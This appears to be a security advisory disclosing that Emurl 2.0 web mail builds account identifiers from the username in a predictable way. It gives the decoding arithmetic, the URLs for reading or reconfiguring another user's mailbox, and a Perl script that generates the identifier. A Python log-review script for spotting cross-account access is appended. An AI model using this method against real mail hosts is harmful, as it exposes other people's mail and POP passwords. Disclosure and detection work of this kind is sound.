COMMAND
EMURL
SYSTEMS AFFECTED
EMURL-based e-mail providers (Emurl 2.0 For Windows NT 4.0)
PROBLEM
Pierre Benoit found the following. Emurl is a web-based e-mail
host developed by SeattleLab. Users can access the mailbox contents
of anybody on the system. They can also steal their POP passwords,
since Emurl allows you to fetch your POP email from more than one
source.
After logging into his new mail account powered by the Emurl
software, this URL struck Pierre:
http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=113100104114116111123
You all know where this is going. First, this identifier is based
solely on your account name. Therefore, if you create an account
with the same name on another site, you'll end up with the very
same identifier. Furthermore, this identifier can easily be
determined, since it is "encoded" by taking the ASCII value of each
character of the lower-cased account name, adding the character's
position, and writing the result as three digits.
In this example, the user ID would be PBenoit and the resulting
identifier would be 113100104114116111123.
p = 112 + 1 = 113
b = 98 + 2 = 100
e = 101 + 3 = 104
n = 110 + 4 = 114
o = 111 + 5 = 116
i = 105 + 6 = 111
t = 116 + 7 = 123
You could fetch the e-mails here:
http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=<identifier>
... and view/change the account's settings here:
http://www.somesite.com/scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=<identifier>
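Pierre threw a few lines of Perl together to generate the identifier:
    #!/usr/bin/perl
    use strict;
    use warnings;

    print "Enter your ID: ";
    my $id = lc(<STDIN>);    # the identifier is built from the lower-cased name
    chomp $id;
    print "Your identifier is: ";
    my @letters = split(//, $id);
    for (my $i = 0; $i < @letters; $i++) {
        # ASCII value of the character plus its 1-based position,
        # zero-padded to three digits
        printf "%03d", ord($letters[$i]) + $i + 1;
    }
    print "\n";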
SOLUTION
SeattleLab is aware and the issue is addressed in their next
release.
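For operators reviewing web-server logs on an affected host, the following added example (not part of the original advisory and not SeattleLab code) decodes the USER parameter back to an account name and flags any client address that requested more than one mailbox. The log layout (client IP, method, URL), the sample lines, the extra account names and the function names are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# USER parameter of the Emurl DLL URLs shown in the advisory.
USER_RE = re.compile(r"/scripts/emurl/\w+\.dll\?(?:.*&)?USER=(\d+)", re.I)

def decode_identifier(ident):
    """Invert the scheme above: 3-digit groups, each = ord(char) + position."""
    if not ident.isdigit() or len(ident) % 3 != 0:
        return None
    chars = []
    for pos, start in enumerate(range(0, len(ident), 3), start=1):
        code = int(ident[start:start + 3]) - pos
        if not 32 <= code < 127:          # not a printable ASCII character
            return None
        chars.append(chr(code))
    return "".join(chars)

def flag_cross_account_access(log_lines, max_accounts=1):
    """Map client IP -> accounts, for clients touching more than max_accounts."""
    seen = defaultdict(set)
    for line in log_lines:
        fields = line.split()
        if len(fields) < 3:
            continue                      # malformed line, skip
        client_ip, url = fields[0], fields[2]
        match = USER_RE.search(url)
        if not match:
            continue
        ident = match.group(1)
        seen[client_ip].add(decode_identifier(ident) or "undecodable:" + ident)
    return {ip: sorted(a) for ip, a in seen.items() if len(a) > max_accounts}

# Constructed sample log lines (hypothetical format: client IP, method, URL).
SAMPLE_LOG = [
    "192.0.2.10 GET /scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=113100104114116111123",
    "192.0.2.10 GET /scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=113100104114116111123",
    "198.51.100.7 GET /scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=098110108103106",
    "198.51.100.7 GET /scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=099113101",
    "198.51.100.7 GET /scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=113100104114116111123",
]

if __name__ == "__main__":
    for ip, accounts in flag_cross_account_access(SAMPLE_LOG).items():
        print(ip, "requested mailboxes:", ", ".join(accounts))
```

Shared proxies and NAT gateways will also show several accounts behind one address, so treat a hit as a lead for review and raise `max_accounts` to suit the site.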